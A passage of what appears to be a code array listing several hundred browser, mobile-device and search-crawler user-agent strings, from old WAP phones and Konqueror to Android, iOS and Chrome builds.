"LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1",
"LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"libwww-perl/5.820",
"Links/0.9.1 (Linux 2.4.24; i386;)",
"Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)",
"Links (2.1pre15; Linux 2.4.26 i686; 158x61)",
"Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)",
"Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12",
"Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d",
"Mediapartners-Google",
"Microsoft URL Control - 6.00.8862",
"Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) ",
"MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0",
"MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0",
"MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0",
"Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1",
"Mozilla/2.02E (Win95; U)",
"Mozilla/2.0 (compatible; Ask Jeeves/Teoma)",
"Mozilla/3.01Gold (Win95; I)",
"Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS)",
"Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180)",
"Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )",
"Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; winfx; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0) ",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0",
"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
"Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]",
"Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)",
"Mozilla/4.8 [en] (Windows NT 5.1; U)",
"Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)",
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
"Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
"Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1",
"Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm)",
"Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) ",
"Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19"
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10"
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.centos4 Firefox/1.0.7"
"Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1)",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu)",
"Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0",
"Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12",
"Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13",
"Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0",
"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145",
"Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3",
"Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941",
"Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 ",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (PLAYSTATION 3; 1.10)",
"Mozilla/5.0 (PLAYSTATION 3; 2.00)",
"Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0",
"Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525",
"Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2",
"Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
